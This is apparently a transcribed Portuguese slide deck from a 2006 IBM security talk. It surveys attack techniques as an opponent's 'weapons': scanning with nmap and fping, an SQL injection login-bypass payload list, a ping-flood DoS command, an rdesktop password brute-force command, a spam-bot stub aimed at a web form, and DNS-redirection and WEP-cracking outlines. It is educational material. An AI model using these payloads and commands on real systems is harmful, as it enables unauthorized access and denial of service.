Elementos de Segurança da Informação em ambientes heterogêneos

Tamanho: px
Começar a partir da página:

Download "Elementos de Segurança da Informação em ambientes heterogêneos"

Transcrição

1 Elementos de Segurança da Informação em ambientes heterogêneos IBM IT Specialist University Ambassador 11/02/06

2 Conceito A melhor maneira de se conhecer as armas de nosso oponente é usando-as! O feito de Alan Turing 2

3 O que são ambientes heterogêneos Repositórios de informações que podem ser acessados pelos seguintes meios: Meio físico Telefonia Rádio Rede 3

4 O que vamos caçar hoje? (As intenções de um ataque) Indisponibilizar um servidor Desfigurar uma página Desviar recursos computacionais/rede Redirecionar tráfego Roubar dados Modificar dados 4

5 Escolham suas armas Brute-force DoS Hardware Exploits Software Exploits DNS flood SQL injection Remote file inclusion Buffer overflow Engenharia social Shell code Ambientes Remoto Local 5

6 Como o campo de batalha foi formado? Guerra-Fria, Corrida Espacial e Internet Telefonia A necessidade de se computar dados em grande escala em Rede (O Unix nasce) A necessidade de se computar dados em pequena escala (O Microcomputador nasce) As Lições do IBM PC (Uma plataforma única, patenteada que se tornou um padrão livre de hardware independente de software.) As Lições da Apple (Uma plataforma única, patenteada, um conjunto inovador de hadware e software) As lições da Microsoft e o novo modelo de negócios da Micro-Computação (Vendas baseadas em licenças de uso e patentes em software) O Unix volta a cena A necessidade de se computar dados em pequena escala em Rede! O novo horizonte 6

7 O novo horizonte O surgimento do GNU (Richard Stallman) A necessidade de um kernel O surgimento da Internet (Tim Berners-Lee) O surgimento do Linux (Linus Torvalds) A Ética Hacker e o Open-Source (Eric Raymond) Catedral e Bazar A liberdade incondicional sobre a propriedade A necessidade de novas linguagems (Perl, Java, Python, PHP) *Ver timeline das linguagens 7

8 A Cultura Hacker e a Terceira Onda A liberdade incondicional sobre a propriedade O livre acesso a informação O trabalho colaborativo entre quem tem algo a agregar A estratégia Open-Source chega aos grandes players: IBM, SUN, Oracle, HP, Novell O modelo de negócios off-shore O home-office Os direitos autorais Copyright law is totally out of date. It is a Gutenberg artifact. Since it is a reactive process, it will probably have to break down completely before it is corrected. Nicholas Negroponte {Being Digital} 8

9 Rastrear Farejar e Monitorar nmap (nmap -v -ss -O /16) fping perl -e ' for (1..254) {print $_\n } ' fping -a -q 2>/dev/null nessus scanlogd ethereal ethercap cain 9

10 SQL Injection Nada mais simples que isso: SELECT fieldlist FROM table WHERE id = 23 OR 1=1 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5 admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 10

11 Remote file injection vikov.htm 11

12 Exemplo de expressão regular (?:http://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\. )*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\. (?:\d+) ){3}))(?::(?:\d+))?)(?:/(?:(?:(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f \d]{2})) (?:% [a-fa-f\d]{ 2})) (?:%[a-fa-f\d]{ 2})) (?:ftp://(?:(?:(?:(?:(?:[a-za- Z\d$\-_.+!*'(),] (? :%[a-fa-f\d]{2})) [;?&=])*)(?::(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a- fa-f\d]{2})) - )*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(? :\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?))(?:/ (?:(?:(?:(?:[a-za-z\d$\-_.+! *'(),] (?:%[a-fa-f\d]{2})) (?:%[a-fa-f\d]{2})) (?:;type=[aidaid])?)?) (?:news:(?: (?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) Z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[ a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))) (?:[a-za-z](?:[a-za-z\d] [_.+-])*) \*)) (?:nntp://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[ a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d ])?)) (?:(?:\d+) (?:\.(?:\d+)){3}))(?::(?:\d+))?)/(?:[a-za-z](?:[a-za-z \d] [_.+-])*)(?:/(?:\d+))?) (?:telnet://(?:(?:(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[afa-f\d]{2})) [;?&=])*)(?::(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) -za- Z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d] )?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?))/?) (?:gopher://(?:(?: (?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?: (?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?:: (?:\d+ (?:%[a-fa-f\d]{2}))(?:(?:(?:[ (?:%[a-fa-f\d]{2}))*)(?:%09 (?:(?:(?:[a-za -Z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) (?:%[a-fa-f\d]{2})) *))?)?)?)?) (?:wais://(?:(?:(?: (?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?: [a-za-z\d] -)*[a-za-z\d])?)) (?: (?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))? )/(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2}))*)(?:(?:/(?:(?:[a-za -Z\d$\-_.+!*'(),] (?:%[a-fa- F\d]{2}))*)/(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2}))*)) \?(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d] {2})) (?:% [a-fa-f\d]{2}))+)) (?:file://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za- Z\d])?)\.)*(?:[a-zA-Z](?:(?:[a-zA-Z\d] -)*[a-za-z\d])?)) (?: (?:\d+)(?:\.(?:\d+)){3})) localhost)?/(?:(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:% [a-fa-f\d]{2})) (?:%[a-fa-f\d]{2})) (?:prospero://(?:(?:(?:(?:(?:[a-za-z \d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -) *[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?)/(?:(?:(?: (? :[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) (?:(?:[ a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) $\-_.+!*'(),] (?:%[a-fa-f\d]{2})) (?:ldap:// (?:(?:(?:(?: (?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?: [a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)) {3}))(?::(?:\d+))? ))?/(?:(?:(?:(?:(?:(?:(?:[a-za-z\d] %(?:3\d [46][a-fA-F\d] [57][Aa\d]) ) (?:%20))+ (?:OID oid)\.(?:(?:\d+)(?:\. (?:\d+))*))(?:(?:%0[aa])?(?:%2 0)*)=(?:(?:%0[Aa])?(?:%20)*))?(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f \d]{2}))*))(?:(?:(?:%0[aa])? (?:%20)*)\+(?:(?:%0[Aa])?(?:%20)*)(?:(?:(? :(?:(?:[a-za-z\d] %(?:3\d [46][a-fA-F\d] [57][Aa\d])) (?:%20))+ (?:OID oid)\.(?: (?:\d+)/])+)))?)) )?) (?:nfs:(?:(?://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za- Z\d])?)\.)*(?:[a-zA-Z](?:(?:[a-zA-Z\d] -)*[a-za-a- F\d]{2}) 12

13 SPAM bot public class attack { } public static void main(string[] args) { String url = "http://www.abcd.com.br/busca.php?txtmail=msg&txtnome=none&txt =no } doitagain doit = new doitagain(5,url); doit.init(); Nome: Mensagem: Submit 13

14 DoS Objetivo: Esgotar a capacidade de entrega de um servidor ping -f -s n <host> 14

15 Exemplo de Brute Force rdesktop -u Administrator -p words.txt <host> 15

16 Redirecionamento de DNS Rasterar portas Encontrar vítima (Access Point) Capturar os dados Explorar falha Mudar DNS primário Mudar os hosts internos Logar tráfego do DNS primário Analisar logs e escolher alvo 16

17 WiFi e a onda de insegurança Decriptar WEP Rastrear: Kismet Netstumbler 17

18 A versatilidade do kernel emacs gzip nano Hardware I/O Processador bash Memória gcc ncurses 18

19 Meu ambiente de testes: Seu ambiente de testes deve ser semelhante ao do seu oponente 19

20 Considerações finais Antes de tudo, seja um bom programador, Conheça bem SQL, Domine infraestrutura de redes ethernet, saiba montar e administrar seus próprios servidores Linux. 20

21 Dúvidas? 11/02/06

22 Thank You! 11/02/06

Modo Básico, passando por senhas em sites

Modo Básico, passando por senhas em sites A Injeção SQL www.invasao.com.br Modo Básico, passando por senhas em sites Hoje em dia é uma prática comum os sites pedirem um cadastro do visitante, e criar-lhe um login, dando acesso a áreas restritas

Leia mais

Ementa Completa. Introdução

Ementa Completa. Introdução Ementa Completa Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades Autorização Non-Disclosure

Leia mais

Martin Vincent Bloedorn. GNU/Linux

Martin Vincent Bloedorn. GNU/Linux Martin Vincent Bloedorn Índice Motivação o que é? Breve história SO e abstrações GNU Origens Liberdade e escolha GNU O começo GNU GPL Free Software Foundation Desenvolvimentos Algo faltando... Linus e

Leia mais

Curso Pentest Profissional

Curso Pentest Profissional Ementa Oficial do Curso Pentest Profissional Capítulo 01 Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades

Leia mais

26/09/2015. Windows Linux Mac OS/X IBM OS/2 Sun Solaris Google Android. MS-DOS Outros... O QUE É? SISTEMAS OPERACIONAIS

26/09/2015. Windows Linux Mac OS/X IBM OS/2 Sun Solaris Google Android. MS-DOS Outros... O QUE É? SISTEMAS OPERACIONAIS O QUE É? SISTEMAS OPERACIONAIS Um programa que vai gerenciar os recursos do seu computador, memória, processador, agenda de tarefas, segurança das transações, autenticação de usuários. Prof. André Aparecido

Leia mais

Segurança em Aplicações Web Metodologia OWASP

Segurança em Aplicações Web Metodologia OWASP Segurança em Aplicações Web Metodologia OWASP Weekly Seminar Lucas Vinícius da Rosa Laboratório de Segurança em Computação () Universidade Federal de Santa Catarina (UFSC) lvrosa@inf.ufsc.br 2012 Sumário

Leia mais

Segurança da Informação

Segurança da Informação Segurança da Informação Segurança e Vulnerabilidades em Aplicações Web jobona@terra.com.br Definição: Segurança Segundo o dicionário da Wikipédia, o termo segurança significa: 1. Condição ou estado de

Leia mais

(In)Segurança Virtual. Técnicas de Ataque e Defesa

(In)Segurança Virtual. Técnicas de Ataque e Defesa (In)Segurança Virtual Técnicas de Ataque e Defesa Expotec 2009 IFRN- Campus Mossoró Nícholas André - nicholasandreoliveira9@gmail.com www.iotecnologia.com.br Mossoró-RN Setembro-2009 O que é preciso! Engenharia

Leia mais

Conteúdo SOFTWARE LIVRE. Terminologia. Histórico de Software Livre. Terminologia: Software livre. Terminologia: Software livre

Conteúdo SOFTWARE LIVRE. Terminologia. Histórico de Software Livre. Terminologia: Software livre. Terminologia: Software livre Conteúdo SOFTWARE LIVRE SCE 186 - Engenharia de Software Profs. José Carlos Maldonado e Elisa Yumi Nakagawa 2 o semestre de 2002 Histórico de Software Livre Terminologia Fases do Licença de Software Livre

Leia mais

Noções de Software. André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com)

Noções de Software. André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com) Noções de Software André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com) Noções de Software; Sistemas Operacionais: Evolução; Conceitos Básicos; Tipos; Exemplos. DEINFO/UFRPE

Leia mais

Administração de Sistemas Operacionais de Rede Linux. Prof. Michel Moron Munhoz michel.moron@aes.edu.br

Administração de Sistemas Operacionais de Rede Linux. Prof. Michel Moron Munhoz michel.moron@aes.edu.br Administração de Sistemas Operacionais de Rede Linux Prof. Michel Moron Munhoz michel.moron@aes.edu.br Conteúdo da disciplina (1 de 2) Visão Geral (multitarefa, mono-tarefa, memória virtual, ambiente gráfico

Leia mais

Software Livre, Distribuições GNU/Linux e Telecomunicações

Software Livre, Distribuições GNU/Linux e Telecomunicações Álvaro Justen (a.k.a. Turicas) Apresentação Graduando em Engª de Telecomunicações - UFF Pesquisa: IF-UFF: Física computacional/estatística Midiacom: Redes sem fio Experiência > 7 anos em GNU/Linux Sócio-fundador

Leia mais

GR1NCH/Rêner (gr1nch@dclabs.com)

GR1NCH/Rêner (gr1nch@dclabs.com) GR1NCH/Rêner (gr1nch@dclabs.com) Agenda O que seria um ataque de SQL Injection. As falhas de um administrador. O código ASP vulnerável. O ponto de vista do invasor e as etapas de um ataque: Levantamento

Leia mais

Manifesto Software Livre

Manifesto Software Livre Manifesto Software Livre Histórico iniciou com a elaboração de um documento denominado: " Manifesto GNU " por Richard Stallman 1.984; marco histórico do surgimento de uma nova forma de criação de Software;

Leia mais

Universidade Federal de Goiás. Alexandre Ferreira de Melo CERCOMP / UFG

Universidade Federal de Goiás. Alexandre Ferreira de Melo CERCOMP / UFG Universidade Federal de Goiás Ubuntu Desktop Alexandre Ferreira de Melo CERCOMP / UFG Conpeex / 2010 Agenda Introdução Conceitos Categorias de Software História do Linux Arquitetura do Linux Ubuntu Projeto

Leia mais

SUMÁRIO. Cercando a instituição. 1 Perfil... 7 O que é perfil?... 8 Por que o perfil é necessário?... 9

SUMÁRIO. Cercando a instituição. 1 Perfil... 7 O que é perfil?... 8 Por que o perfil é necessário?... 9 SUMÁRIO Parte I Cercando a instituição Estudo de caso............................................. 2 ETUQDA É tudo uma questão de anonimato........................ 2 A-Tor-mentando as pessoas do bem...............................

Leia mais

Software Livre e Inovação Tecnológica

Software Livre e Inovação Tecnológica Software Livre e Inovação Tecnológica Fábio Olivé (fabio.olive@gmail.com) Tópicos O que significa Livre em Software Livre? De onde veio e quem usa Software Livre? A qualidade diferenciada do Software Livre

Leia mais

Acesso a banco de dados

Acesso a banco de dados Acesso a banco de dados 1. Crie uma pasta chamada AcessoBD com as seguintes subpastas: Aplicativos, Drivers, AcessoMSACCESS, AcessoMySQL e AcessoSQLSERVER Exemplo 1: MS ACCESS 1. Crie um banco de dados

Leia mais

Segurança na Web. André Tavares da Silva. andre.silva@udesc.br

Segurança na Web. André Tavares da Silva. andre.silva@udesc.br Segurança na Web André Tavares da Silva andre.silva@udesc.br Propósito da Segurança A segurança não é usada simplesmente para proteger contra ataques diretos mas é essencial para estabelecer credibilidade/confiança

Leia mais

1ª QUESTÃO Linguagem C Vantagens: Desvantagens: Linguagem C++ Vantagens: Desvantagens:

1ª QUESTÃO Linguagem C Vantagens: Desvantagens: Linguagem C++ Vantagens: Desvantagens: 1ª QUESTÃO Linguagem C Vantagens: É uma linguagem simples que nos permite trabalhar com funções matemáticas, ficheiros, entre outras sendo necessário para tal a inclusão de bibliotecas padrão as quais

Leia mais

Sistema Operacional. História Sistema Operacional 1. QI Escolas e Faculdades Apostila de Linux

Sistema Operacional. História Sistema Operacional 1. QI Escolas e Faculdades Apostila de Linux 4 Capítulo 1 Sistema Operacional É uma coleção de programas que inicializa hardwares, fornece rotinas básicas para controle de dispositivos, mantém a integridade de um sistema. Um sistema operacional de

Leia mais

Mistificando o Software Livre

Mistificando o Software Livre Marcelo de Gomensoro Malheiros mgm@univates.br UNIVATES Roteiro Apresentação Constatações Gratuidade Novidade Indústria Usuários Futuro Conclusão Apresentação Da platéia... Apresentação Do palestrante...

Leia mais

JDBC DRIVER. Objetivo: Possibilitar aplicações não Zim de se conectar a um banco de dados Zim utilizando as normas JDBC.

JDBC DRIVER. Objetivo: Possibilitar aplicações não Zim de se conectar a um banco de dados Zim utilizando as normas JDBC. Objetivo: Possibilitar aplicações não Zim de se conectar a um banco de dados Zim utilizando as normas JDBC. Requisitos para usar o driver JDBC Do lado do cliente: O driver JDBC Do lado do servidor: A base

Leia mais

Oficina de ferramentas de Gerência para Redes em Linux. Prof. Jefferson Santiago

Oficina de ferramentas de Gerência para Redes em Linux. Prof. Jefferson Santiago Oficina de ferramentas de Gerência para Redes em Linux Prof. Jefferson Santiago Apresentação Qual seu nome? Já possui experiência na área? Questionário avaliativo Acesse: http://goo.gl/forms/4rfaomufim

Leia mais

A t i v i s t a s d o S o f t w a r e L i v r e

A t i v i s t a s d o S o f t w a r e L i v r e GRUPO Badio Gomes Rafael Neves Roger Luis Wilson Junior Indice Eric Raymond Bruce Perens Richard M. Stallman Linus Torvalds Ativistas brasileiros A t i v i s t a d o S o f t w a r e L i v r e Eric Raymond

Leia mais

Segredos do Hacker Ético

Segredos do Hacker Ético Marcos Flávio Araújo Assunção Segredos do Hacker Ético 2 a Edição Visual Books Sumário Prefácio... 21 Introdução... 23 1 Entendendo o Assunto... 25 1.1 Bem-vindo ao Obscuro Mundo da Segurança Digital...25

Leia mais

Lista de Exercícios I

Lista de Exercícios I UNIVERSIDADE SALGADO DE OLIVEIRA CAMPUS RECIFE Curso: Redes de Computadores Disciplina: Segurança da Informação Professor (a): Carlos Sampaio Revisão V1 Turma: 67131N Data: Lista de Exercícios I NOTA Ataques

Leia mais

SOFTWARE LIVRE. Fábio Rodrigo Barby Informática - IFPR

SOFTWARE LIVRE. Fábio Rodrigo Barby Informática - IFPR SOFTWARE LIVRE Fábio Rodrigo Barby Informática - IFPR Software Livre x Software Proprietário Software Proprietário O que é? Copyright; Cópia é proibida; Redistribuição é proibida; Modificação é proibida;

Leia mais

Tutorial. Começando a Criar Aplicativos SMS

Tutorial. Começando a Criar Aplicativos SMS Tutorial Começando a Criar Aplicativos SMS Para começar Neste tutorial você vai entender como criar e integrar um aplicativo SMS usando a Brazapp. Para uma melhor compreensão, passaremos por todos os passos:

Leia mais

Fábio Giordani. Técnico em Processamento de Dados Adm. Análise de Sistemas. Outros cursos. Coordenador Projetos e Consultoria em Infraestrutura

Fábio Giordani. Técnico em Processamento de Dados Adm. Análise de Sistemas. Outros cursos. Coordenador Projetos e Consultoria em Infraestrutura Fábio Giordani Técnico em Processamento de Dados Adm. Análise de Sistemas Cobol Developer (Caracter mode ;-) DBA (Oracle 7.1...) Developer (GUI) Java Outros cursos Coordenador Projetos e Consultoria em

Leia mais

Manipulação de Banco de Dados com Java 1. Objetivos

Manipulação de Banco de Dados com Java 1. Objetivos Manipulação de Banco de Dados com Java 1. Objetivos Demonstrar os fundamentos básicos para a manipulação de banco de dados com Java; Apresentar a sintaxe de comandos SQL usados em Java. 2. Definições A

Leia mais

Informática I. Aula 19. http://www.ic.uff.br/~bianca/informatica1/ Aula 19-20/11/06 1

Informática I. Aula 19. http://www.ic.uff.br/~bianca/informatica1/ Aula 19-20/11/06 1 Informática I Aula 19 http://www.ic.uff.br/~bianca/informatica1/ Aula 19-20/11/06 1 Ementa Histórico dos Computadores Noções de Hardware e Software Microprocessadores Sistemas Numéricos e Representação

Leia mais

SISTEMA OPERACIONAL & SOFTWARE LIVRE

SISTEMA OPERACIONAL & SOFTWARE LIVRE Curso Técnico em Redes de Computadores Disciplina de Sistemas Operacionais Livres SISTEMA OPERACIONAL & SOFTWARE LIVRE Professora: Juliana Cristina dos Santos E-mail: professora@julianacristina.com Site:

Leia mais

JDBC Acessando Banco de Dados

JDBC Acessando Banco de Dados Acessando Banco de Dados Objetivos Entender o que são Drivers. Diferenciar ODBC, JDBC e DRIVERMANAGER. Desenvolver uma aplicação Java para conexão com Banco de Dados. Criar um objeto a partir da classe

Leia mais

Software de sistema Software aplicativo

Software de sistema Software aplicativo SOFTWARE O que é Software? Software, logicial ou programa de computador é uma sequência de instruções a serem seguidas e/ou executadas, na manipulação, redireccionamento ou modificação de um dado/informação

Leia mais

Uso de software livre na indústria. propriedade intelectual e modelos de negócio. Nelson Lago CCSL IME-USP

Uso de software livre na indústria. propriedade intelectual e modelos de negócio. Nelson Lago CCSL IME-USP Uso de software livre na indústria propriedade intelectual e modelos de negócio Nelson Lago CCSL IME-USP Por que software livre? Diversas razões para adotar software livre: Software livre como opção ética

Leia mais

Entendendo e Mitigando Ataques Baseados em HTTP Parameter Pollution (HPP)

Entendendo e Mitigando Ataques Baseados em HTTP Parameter Pollution (HPP) Entendendo e Mitigando Ataques Baseados em HTTP Parameter Pollution (HPP) 05/12/2009 Ricardo Kléber M. Galvão rk@cefetrn.br Aplicações Web Modernas (3 Camadas) Cliente Aplicação Web Browser Microsoft IIS

Leia mais

Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados. Prof. Josenildo Silva jcsilva@ifma.edu.br

Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados. Prof. Josenildo Silva jcsilva@ifma.edu.br Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados Prof. Josenildo Silva jcsilva@ifma.edu.br Introdução O JDBC (Java Database Connectivity) foi criado com o intuito de fornecer aos programadores

Leia mais

História do GNU/Linux

História do GNU/Linux História do GNU/Linux Antes de mais nada, o que é um sistema operacional? Sistema operacional é um software básico que permite aos programas executarem suas tarefas. É o sistema operacional que fornece

Leia mais

GBD. Introdução PROF. ANDREZA S. AREÃO

GBD. Introdução PROF. ANDREZA S. AREÃO GBD Introdução PROF. ANDREZA S. AREÃO Sistema de arquivos X Sistemas de Banco de Dados Sistema de arquivos Sistema de Banco de Dados Aplicativos Dados (arquivos) Aplicativos SGBD Dados (arquivos) O acesso/gerenciamento

Leia mais

Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t

Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de

Leia mais

Cronograma Nem só de nerds e geeks vive o Software-Livre

Cronograma Nem só de nerds e geeks vive o Software-Livre FLISOL 2011 Como organismos biológicos, feitos de matéria, somos sujeitos às leis da física e da biologia; como pessoas conscientes, que criam nossa própria história, somos livres para decidir como esta

Leia mais

Redes de Computadores

Redes de Computadores Redes de Computadores LAMP Gustavo Reis gustavo.reis@ifsudestemg.edu.br Acrônico para a combinação de Linux, Apache, MySQL e PHP ou Perl ou Python; Recentemente a letra P começou a fazer referência a Perl

Leia mais

Acesso a Bancos de Dados em Java (JDBC)

Acesso a Bancos de Dados em Java (JDBC) Acesso a Bancos de Dados em Java (JDBC) Jomi Fred Hübner Universidade Regional de Blumenau Departamento de Sistemas e Computação Roteiro Introdução Objetivo da JDBC Vantagens Visão geral do acesso a SGBDs

Leia mais

Instituto Politécnico de Beja. Escola Superior de Tecnologia e Gestão. Licenciatura em Engenharia Informática. Relatório de Portfólio.

Instituto Politécnico de Beja. Escola Superior de Tecnologia e Gestão. Licenciatura em Engenharia Informática. Relatório de Portfólio. Instituto Politécnico de Beja Escola Superior de Tecnologia e Gestão Licenciatura em Engenharia Informática Relatório de Portfólio GNU / Linux Nº 3113 Beja 2007 1 Índice Índice... 2 Resumo... 3 A Actividade...

Leia mais

JPA: Persistência padronizada em Java

JPA: Persistência padronizada em Java JPA: Persistência padronizada em Java FLÁVIO HENRIQUE CURTE Bacharel em Engenharia de Computação flaviocurte.java@gmail.com Programação Orientada a Objetos X Banco de Dados Relacionais = Paradigmas diferentes

Leia mais

Administrando o sistema linux TCP/IP

Administrando o sistema linux TCP/IP TCP/IP Principais Ferramentas para Redes - ifconfig Configura Interfaces (ethernet, atm, tun, pppoe e etc.) Ex.: ifconfig eth0 192.168.0.10 netmask 255.255.255.0 ifconfig eth0 ifconfig eth0 up ifconfig

Leia mais

Noções de Software. André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com)

Noções de Software. André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com) Noções de Software André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com) 1 Noções de Software; Sistemas Operacionais: Evolução; Conceitos Básicos; Tipos; Exemplos. DEINFO/UFRPE

Leia mais

Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit. Inj3cti0n P4ck3t

Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit. Inj3cti0n P4ck3t Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de Programação:

Leia mais

GNU/LINUX: A OBRA-PRIMA DA COLABORATIVIDADE

GNU/LINUX: A OBRA-PRIMA DA COLABORATIVIDADE GNU/LINUX: A OBRA-PRIMA DA COLABORATIVIDADE Felipe Peixoto Araujo, Izabela Karennina Travizani Maffra, Laura Rolla Antuña, Tatiana Schmidt Gonçalves Universidade Federal de Minas Gerais, Departamento de

Leia mais

Aula 1 Acesso a Banco de Dados

Aula 1 Acesso a Banco de Dados Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados Prof. Josenildo Silva jcsilva@ifma.edu.br Introdução O JDBC (Java Database Connectivity) foi criado com o intuito de fornecer aos programadores

Leia mais

3 Ataques e Intrusões

3 Ataques e Intrusões 3 Ataques e Intrusões Para se avaliar a eficácia e precisão de um sistema de detecção de intrusões é necessário testá-lo contra uma ampla amostra de ataques e intrusões reais. Parte integrante do projeto

Leia mais

Introdução. Sistemas Operacionais

Introdução. Sistemas Operacionais FATEC SENAC Introdução à Sistemas Operacionais Rodrigo W. Fonseca Sumário Definição de um S.O. Características de um S.O. História (evolução dos S.O.s) Estruturas de S.O.s Tipos de Sistemas Operacionais

Leia mais

É a associação de mais de um fluxo de execução em um único processo.

É a associação de mais de um fluxo de execução em um único processo. Profa. Rita Rodorigo Threads Um processo é uma abstração que reúne uma série de atributos como espaço de endereçamento descritores de arquivos abertos, quotas, etc. Um processo possui ainda uma área de

Leia mais

CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o Documentário RevolutionOS

CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o Documentário RevolutionOS SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o

Leia mais

Linux. Guia do Administrador do Sistema. Rubem E. Ferreira. Novatec Editora Ltda. www.novateceditora.com.br

Linux. Guia do Administrador do Sistema. Rubem E. Ferreira. Novatec Editora Ltda. www.novateceditora.com.br Linux Guia do Administrador do Sistema Rubem E. Ferreira Novatec Editora Ltda. www.novateceditora.com.br 1 O início de tudo Entre os vários sistemas operacionais existentes, o Unix é um exemplo de maturidade

Leia mais

O Windows é um software de sistema, que permite ao utilizador interagir com o computador e com os seus periféricos.

O Windows é um software de sistema, que permite ao utilizador interagir com o computador e com os seus periféricos. Sistema Operativo Windows - Ambiente de trabalho - Janelas - Atalhos - Programas - Gestão de pastas e ficheiros - Menu iniciar O Windows é um software de sistema, que permite ao utilizador interagir com

Leia mais

Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t

Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de

Leia mais

Sistema Operacional GNU Linux. Sistema de Arquivos Diretório /usr. Conceitos Básicos Pacotes Repositório Código Fonte. Ambiente Menus GConf

Sistema Operacional GNU Linux. Sistema de Arquivos Diretório /usr. Conceitos Básicos Pacotes Repositório Código Fonte. Ambiente Menus GConf Capacitação Linux Sumário 1 Introdução Sistema Operacional GNU Linux 2 Filesystem Hierarchy Standard Introdução Sistema de Arquivos Diretório /usr 3 Instalação de Programas Conceitos Básicos Pacotes Repositório

Leia mais

Ameaças, riscos e vulnerabilidades Cont. Objetivos

Ameaças, riscos e vulnerabilidades Cont. Objetivos Ameaças, riscos e vulnerabilidades Cont. Prof. Esp. Anderson Maia E-mail: tecnologo.maia@gmail.com Objetivos entender a definição dos termos hacker, cracker e engenharia social; compreender a anatomia

Leia mais

